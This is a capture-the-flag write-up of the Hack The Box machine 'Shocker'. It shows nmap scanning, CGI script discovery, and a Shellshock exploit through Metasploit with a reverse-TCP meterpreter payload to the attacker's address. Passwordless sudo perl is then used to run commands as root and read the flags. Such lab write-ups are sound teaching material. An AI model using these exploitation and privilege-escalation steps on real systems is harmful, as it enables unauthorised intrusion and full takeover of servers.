Shocker – Hack The Box

Machine: https://app.hackthebox.com/machines/Shocker

On to the next machine! Me being lazy just trying port 80 before doing any scan:

Nice!

So let’s bug him? We got the following software running on the server:

$ sudo nmap -sV -O shocker.htb
...
PORT     STATE SERVICE VERSION
80/tcp     open  http     Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)

Old Apache means we should look for scripts in /cgi-bin and maybe be able to exploit one using Shellshock.

After much (dir)busting, I found this:

$ curl http://shocker.htb/cgi-bin/user.sh
Content-Type: text/plain

Just an uptime test script

 08:49:56 up  1:21,  0 users,  load average: 0.06, 0.06, 0.01

Then I used Metasploit with the following options (truncated default values from the paste) and got an initial foothold as a user:

msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > options

Module options (exploit/multi/http/apache_mod_cgi_bash_env_exec):

   Name            Current Setting   Required  Description
   ----                    ---------------        --------       -----------
   RHOSTS          shocker.htb       yes       The target host(s)
   RPORT            80                      yes       The target port (TCP)
   TARGETURI    /cgi-bin/user.sh  yes       Path to CGI script

Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----            ---------------      --------       -----------
   LHOST  10.10.14.4       yes       The listen address (an interface may be specified)
   LPORT  4444                yes       The listen port

Exploit target:

   Id  Name
   --  ----
   1   Linux x86_64

View the full module info with the info, or info -d command.

msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > run

[*] Started reverse TCP handler on 10.10.14.4:4444 
[*] Command Stager progress - 100.46% done (1097/1092 bytes)
[*] Sending stage (1017704 bytes) to 10.10.10.56
[*] Meterpreter session 1 opened (10.10.14.4:4444 -> 10.10.10.56:40898) at 2023-01-09 08:58:46 -0500

meterpreter > getuid
Server username: shelly

And we have the user flag:

meterpreter > cat /home/shelly/user.txt
aada***********************************

Getting root doesn’t seem to be much more complicated. We can run sudo perl as root without any password:

meterpreter > shell
Process 3852 created.
Channel 4 created.
python3 -c 'import pty;pty.spawn("/bin/bash")'
shelly@Shocker:~$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl

So we g3t r00t and find the flag:

$ echo "system('whoami');" | sudo /usr/bin/perl    
root

$ echo "system('cat /root/root.txt');" | sudo /usr/bin/perl
ff97****************************

What did we learn from this machine?

If the server looks empty, keep enumerating the URL. Go into specific file types that one may expect to find in directions like cgi-bin. E.g. don’t look for .php files in cgi-bin but rather .cgi or .sh.